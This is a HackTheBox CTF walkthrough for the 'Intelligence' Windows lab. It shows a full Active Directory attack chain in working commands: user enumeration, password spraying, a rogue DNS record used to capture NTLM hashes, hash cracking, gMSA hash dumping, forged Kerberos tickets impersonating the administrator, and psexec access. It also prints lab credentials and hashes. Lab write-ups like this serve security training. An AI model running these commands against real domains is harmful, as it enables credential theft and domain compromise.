Intelligence HacktheBox Walkthrough
Introduction
Intelligence is a CTF Windows box with difficulty rated as “medium” on the HackTheBox platform. The machine covers OSINT, AD attacks, and silver ticket for privilege escalation.
Table of Content
Network Scanning
- Nmap
Enumeration
- Directory enumeration to find PDFs
- Extracting usernames from PDF’s exif
- Hunting password in PDF and SMB login to extract info on a 5 min recurring powershell script
- Adding DNS record to catch NTLM hash
- NTHASH of the GMSA svc_int$
Exploitation
- Obtaining TGT
Privilege Escalation
- Performing silver ticket attack
Let’s deep dive into this.
Network Scanning
The dedicated IP address of the machine is 10.129.163.131. We’ll run a nmap scan on this machine’s IP.
nmap -sV -p- 10.129.163.131
We found many ports open; 53 – DNS, 80 – HTTP and 445- SMB caught our eye.
Enumeration
Immediately headed over to SMB and tried listing shares without password but it was not fruitful.
We then immediately headed over to the website and saw various PDFs available to download.
We then downloaded these PDFs which had some written material. Upon checking their exif we saw the author’s names that could be actual users on the Active Directory on the server.
To verify the existence of these users we copy them into a file and use kerberute’s userenum function
echo "Jose.Williams" > usernames echo "William.Lee" >> usernames kerberute userenum -d intelligence.htb --dc 10.129.163.131 usernames
Now that the validity of these users has been confirmed, lets look if there are any more PDFs on the /documents directory on the server.
Since we don’t have access to view the directory, we can fuzz the file names of the PDFs and try to check their existence. See the PDF downloaded above, they are in the format YYYY-MM-DD, so I designed a script to generate these dates and then append “-upload.pdf” at the end of it.
#!/bin/bash start=2020-01-01 end=2022-01-01 while ! [[ $start > $end ]]; do echo $start start=$(date -d "$start + 1 day" +%F) done ./fuzz_date.sh > datelist.txt cat datelist.txt | head -n 3 sed -i s/$/-upload.pdf/ datelist.txt cat datelist.txt | head -n 3
Now that we have a text file ready, we need to fuzz it using DIRB and save the existing PDFs in a file called existing.txt
dirb http://10.129.163.131/documents/ datelist.txt -o existing.txt
Now that we have found that many other PDFs exist on the server, and copied their absolute paths into a text file, we need to edit this file quickly so that one URL comes in one line. This will be used later.
sed 's/[^ ]* //' existing.txt > 2.txt sed 's/\s.*$//' 2.txt > 3.txt cat 3.txt | head -n 4 rm existing.txt 2.txt && mv 3.txt existing.txt
Now, we can download all the PDFs at once (mass download) using wget like
wget -i /home/kali/hackthebox/intelligence/existing.txt
Now, I went through the files one by one and found a password in one of the PDFs
But this password did not belong to the two users we had found earlier. So, we looked around and found many other users are being revealed through exif. Hence, we looked at all of the PDF’s exif, saved the username in a file so that each user is in a separate line.
echo "NewIntelligenceCorpUser9876" > password.txt exiftool *.pdf | grep Creator > u1.txt sed 's/.*://' u1.txt > u2.txt sed 's/[^ ]* //' u2.txt > u3.txt rm u1.txt u2.txt
Exploitation
Now, we can use crackmapexec to bruteforce usernames against the found password.
crackmapexec smb 10.129.163.131 -u u3.txt -p NewIntelligenceCorpUser9876
We did find one valid entry!
User: Tiffany.Molina
Now we tried to list the SMB shares using the obtained credentials.
smbclient -L 10.129.163.131 -U Tiffany.Molina%NewIntelligenceCorpUser9876
The share called “IT” had an interesting powershell script called downdetector.ps1. This script was, at 5 minutely intervals, firing out web requests to see if it got an HTTP status 200. It was looking at AD entries where the object name started with ‘web’ and finally sending out a WebRequest.
We need this WebRequest to reach our machine instead and for that we need to add a DNS record that points to us, so that we can capture auth request. For this, we’ll be using DNSUpdate script that can be found here.
git clone https://github.com/Sagar-Jangam/DNSUpdate.git pip3 install -r requirements.txt
Let us first set up a responder on our local system (HTB tunnel)
We can add the DNS record using the following command.
python3.10 DNSUpdate.py -DNS 10.129.163.131 -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a ad -r webharsh -d 10.10.16.10
It got added! Now we waited for 5 minutes and got juicy hash of a user Ted Graves
Now we copy this hash into a file called “hash” and run hashcat on it. 5600 is the code for netntlmv2 type hash.
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
As you can see, we have received a password!
Now that I had the credential for Ted, I instantly used ldapsearch to dump information about the directory on the server
ldapsearch -H ldap://10.129.163.131 -x -W -D "Ted.Graves@intelligence.htb" -b "dc=intelligence,dc=htb"
This gave me an interesting insight. A group managed service account was running on the domain.
This MSA was trusted for delegation to WWW. So, this MSA’s password can be dumped now that we have ted’s credential. (check the article here) So, we will use gMSA dumper tool to do this. You can download this here
We can dump the account’s hash using the command (add intelligence.htb in /etc/hosts first)
echo "10.129.163.131 intelligence.htb" >> /etc/hosts git clone https://github.com/micahvandeusen/gMSADumper.git python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
Voila! We received a hash of the service account.
With this service account’s hash, we can use Impacket toolkit’s script getST.py to create a silver ticket. But we encountered a problem with this. After some googling, it turns out that we need to sync our time clock with the server’s time in order for silver ticket to work. We do this like following:
apt install ntpdate sudo ntpdate 10.129.163.131
Post Exploitation
Make sure impacket is installed and upgraded.
pip3 install impacket --upgrade
Now, we will use getST.py to generate ourselves a silver ticket using the command:
python3 /usr/share/doc/python3-impacket/examples/getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :6e03616eef48ba6a15be62280aefcdb2 -impersonate administrator
We need to export administrator.ccache first and then we need to add dc.intelligence.htb in our hosts file. Load the ccache ticket by setting the KRB5CCNAME environment variable to the ticket path. This environment variable automatically picks up the kirby ticket (stored in administrator.ccache) and uses in attacks against domain.
export KRB5CCNAME=administrator.ccache echo "10.129.163.131 dc.intelligence.htb" >> /etc/hosts klist
Finally, we can use Impacket’s psexec to connect as an administrator and snag our root flag!
python3 /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass dc.intelligence.htb cd ../../Users/Administrator type root.txt
Conclusion
The lab does not carry any traditional CTF like qualities but resembles highly to what one can see in real life. From extracting information from PDFs to validating existence of a user to compromising the Admin account by exploiting misconfiguration, the lab gives a lot to think about the actual existing security posture on Active Directories. There were no CVEs exploited in the lab and yet this type of exploitation is very common. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here